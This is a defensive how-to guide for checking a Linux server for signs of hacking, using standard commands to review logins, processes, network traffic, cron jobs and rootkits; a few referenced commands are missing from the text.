Introduction
The following steps may help you find traces of hacking on your Linux server.
1 Monitor users’ activities
2 Check system process
3 Check the network traffic
4 Check cron jobs
5 Check Rootkits infections
1 Monitor users’ activities
1.1 Check the currently logged-in user
First, log in to your Linux server to view the currently logged-in user through the command "
w". Then, go to
https://www.iplocation.net/ to check the logged-in IP address. If there are any unfamiliar IPs, your server may be hacked.
1.2 Check recently logged in users and IP information
Use the command "last -10" to view the information of users who have recently logged in to the system.
1.3 Check the bash history
If you suspect a specific user of malicious activity, you can check the bash history. Log in as the user you would like to investigate and run the commands below.
2 Check system process
The first step is to check if there are any unknown or suspicious processes.
2.1 Check processes with high CPU and memory usage
Use the command "top" to view the processes that occupy more than 30% of the CPU or memory. If it is not the process you are running, your Linux server may be implanted with malicious programs.
2.2 Check all processes
View all process information through the command "ps -aux".
2.3 Check process-related files based on PID
Check the files opened by the process by the command "lsof -p PID". Please replace the PID with the PID number of the suspicious process obtained in the previous two steps.
If it prompts the "-bash: lsof: command not found" error, you need to install lsof:
CentOS: yum install -y lsof
Ubuntu: sudo apt-get install -y lsof
2.4 Check the exe file of suspicious process
Use the command "ll /proc/PID/exe" to view the exe file associated with the suspicious process. Make sure to replace the PID with the PID number of the suspicious process obtained in the previous two steps. If you detect any suspicious script file, then your Linux server is probably hacked.
3 Check network traffic
If a hacker keeps something in your system for communication or sending messages, you can detect it by monitoring your traffic for unusual activity.
3.1 Check bandwidth usage
Use the command "iftop -n -P" to monitor the current network traffic.
If it prompts the "-bash: iftop: command not found" error, you need to install iftop first:
CentOS: yum install -y iftop
Ubuntu: sudo apt-get install -y iftop
The first column shows the localhost, => and <= indicates the traffic is incoming and outgoing respectively. Some are followed by the remote host addresses.
The last column presents the bandwidth used by each connection.
TX: send traffic
RX: receive traffic
TOTAL: total traffic
Cum: Total traffic from running iftop to the current time
peak: peak flow
3.2 Check listening and active ports
Check the listening and active ports by running the command "netstat -la".
4 Check cron jobs
Hackers may place cron scheduled tasks in /etc/crontab, which will run malicious commands regularly.
Use the following command to view the scheduled tasks that the current user is running:
View scheduled tasks of other users:
To view the daily, hourly, weekly and monthly cron jobs, use the following command:
ls -la /etc/cron.hourly
ls -la /etc/cron.daily
ls -la /etc/cron.weekly
ls -la /etc/cron.monthly
Edit cron jobs:
crontab -e
service crond restart
5 Check Rootkits infections
Rootkit is one of the most dangerous threats to devices. It may result in a system re-installation or even a forced hardware replacement. There is a simple command which can help us to detect the most known rootkits, the command "chkrootkit"(check rootkits).
First, we need to install chkrootkit:
CentOS: Run the following commands:
cd ~
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
tar xvf chkrootkit.tar.gz
cd chkrootkit-*
make sense
./chkrootkit
Ubuntu:
# apt-get update
# apt install chkrootkit -y
# chkrootkit